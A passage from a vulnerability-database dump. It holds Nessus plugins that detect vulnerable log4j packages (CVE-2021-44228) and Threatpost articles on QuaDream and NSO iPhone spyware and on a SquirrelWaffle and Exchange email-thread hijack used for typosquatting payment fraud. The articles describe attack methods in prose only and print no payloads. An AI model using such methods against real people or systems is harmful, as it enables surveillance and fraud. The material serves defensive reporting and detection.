(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j", "p-cpe:/a:novell:opensuse:log4j-javadoc", "p-cpe:/a:novell:opensuse:log4j-jcl", "p-cpe:/a:novell:opensuse:log4j-slf4j", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1586.NASL", "href": "https://www.tenable.com/plugins/nessus/156150", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1586-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1586-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect 
against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193611\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MM3SIUADOVLPKKTSRFXAGFZXOZH63CFG/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d0e0a2b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-44228\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc, log4j-jcl and / or log4j-slf4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-jcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs 
= [\n {'reference':'log4j-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-jcl-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-slf4j-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-jcl / log4j-slf4j');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T02:24:23", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 93a1c9a7-5bef-11ec-a47a-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. 
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-03-18T00:00:00", "type": "nessus", "title": "FreeBSD : openhab -- log4j remote code injection (93a1c9a7-5bef-11ec-a47a-001517a2e1a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:openhab", "p-cpe:/a:freebsd:freebsd:openhab2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "href": "https://www.tenable.com/plugins/nessus/159065", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159065);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"FreeBSD : openhab -- log4j remote code injection (93a1c9a7-5bef-11ec-a47a-001517a2e1a4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote 
host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 93a1c9a7-5bef-11ec-a47a-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. 
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q\");\n # https://github.com/openhab/openhab-distro/security/advisories/GHSA-j99j-qp89-pcfq\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e4b243\");\n # https://github.com/ops4j/org.ops4j.pax.logging/security/advisories/GHSA-xxfh-x98p-j8fr\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03d2b934\");\n # https://vuxml.freebsd.org/freebsd/93a1c9a7-5bef-11ec-a47a-001517a2e1a4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c452b373\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openhab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openhab2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'openhab2<3.1.1',\n 'openhab<3.1.1',\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. 
The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. 
The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the 
mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. 
State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. 
\u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T22:38:10", "description": "[SquirrelWaffle](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) \u2013 the newish malware loader that[ first showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September \u2013 once again got its scrabbly little claws into an unpatched Microsoft Exchange server to spread malspam with its tried-and-true trick of [hijacking](<https://threatpost.com/ikea-email-reply-chain-attack/176625/>) email threads.\n\nThat\u2019s the same-old, same-old, as in, a SquirrelWaffle campaign will hijack an email thread to increase the chances that a victim will click on malicious links. 
Those rigged links are tucked into an email reply, similar to how the virulent[ Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has operated.\n\nBut this time, the operators added a twist: They sucked knowledge out of an email thread and used it to trick the target into a money transfer.\n\nThey almost pulled it off. The targeted organization initiated a money transfer to an attacker-controlled account, but thankfully, one of the financial institutions involved in the transaction smelled a rat and flagged the deal as fraudulent.\n\nIn a Tuesday [post](<https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/>), Sophos analysts Matthew Everts and Stephen McNally said that typically, in SquirrelWaffle attacks \u2013 which typically entail the threat actors walking through holes left by unpatched, notorious,[ oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>)[ ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and[ ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities \u2013 the attack ends when those holes finally get patched, removing the attacker\u2019s ability to send emails through the server.\n\nBut in this recent engagement, the Sophos Rapid Response team found that while a SquirrelWaffle malspam campaign was wreaking havoc on an unpatched server, that same vulnerable server was being used by the attackers to siphon off knowledge from a stolen email thread and to launch a financial fraud attack.\n\n\u201cThe combination of Squirrelwaffle, ProxyLogon, and ProxyShell has been encountered by the Sophos Rapid Response team multiple times in the last few months, but this is the first time we have seen attackers use typo-squatting to maintain 
the ability to send spam once the Exchange server has been remediated,\u201d the analysts wrote.\n\n## Too Late to Patch That Leaky Exchange Roof\n\nIn this case, patching Exchange wouldn\u2019t have clipped SquirrelWaffle\u2019s tail, the analysts said, given that the attackers had already spirited away an email thread about customer payments from the victim\u2019s Exchange server.\n\nBesides which, as the analysts noted and as Sophos [detailed](<https://news.sophos.com/en-us/2021/03/25/patching-alone-is-not-enough-investigate-your-exposure-windows/>) last March, patching isn\u2019t the end-all, be-all for remediating vulnerable Exchange servers. For one thing, you also need to determine whether attackers have pulled off any other mischief, such as installing webshells.\n\n## Typosquatting Their Way Into Inboxes\n\nThe double-up attack on the vulnerable Exchange server started with the attackers registering a [typosquat](<https://threatpost.com/malformed-url-prefix-phishing-attacks-spike-6000/164132/>) domain. In other words, they registered a domain name that resembled the victim\u2019s legitimate domain but with a small typo, then used email addresses from the look-alike domain to reply to the email thread.\n\n\u201cMoving the conversation out of the victim\u2019s email infrastructure gave the attackers operational control over what happened next,\u201d Everts and McNally explained.\n\nWhat happened next was that the attackers tried to divert the victim\u2019s customer\u2019s payments to accounts they controlled. In their hunt for legitimacy, they went so far as to copy more email addresses, to make it look like they were requesting support from an internal department. 
But these additional email addresses were just as bogus, being sent with the same almost, not-quite, look-alike typosquat domain.\n\nNext, they started using \u201cthis transaction\u2019s ready to go!\u201d language, as in the screen capture Sophos provided below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163107/finance_dept_cc_ed.jpg>)\n\nSource: Sophos.\n\nNext came some foot-tappingly stern language to ratchet up the urgency, as shown in the next screen grab. \u201cI appreciate how busy you are,\u201d the crooks crooned, among other things that sounded like legitimate accounting blah-blah-blah, \u201cbut wondered if you could give me an update regarding the renewal?\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163737/More_accounting-ese.jpg>)\n\nSource: Sophos.\n\nThe attackers\u2019 fake accountant faux-relaxed after the SquirrelWaffle operators received an email indicating that the illegitimate payment was being processed, assuring their mark that they\u2019d get them an invoice ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15164119/kind_regards.jpg>)\n\nSource: Sophos.\n\n## How to Cage This Twitchy Rodent\n\nSophos offered advice on how to protect against malicious email attacks such as the SquirrelWaffle campaign, the first of which is a head-desk-bang-bang clich\u00e9: Namely, patch those servers.\n\n\u201cThe single biggest step defenders can take to prevent the compromise and abuse of on premises Microsoft Exchange servers is to ensure that they have been patched with the most recent updates from Microsoft,\u201d according to the post.\n\nAlso:\n\n * Implement industry standards for email authentication, such as SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication Reporting and Conformance, in order to make it easier for other organizations to figure out if emails are legitimate. 
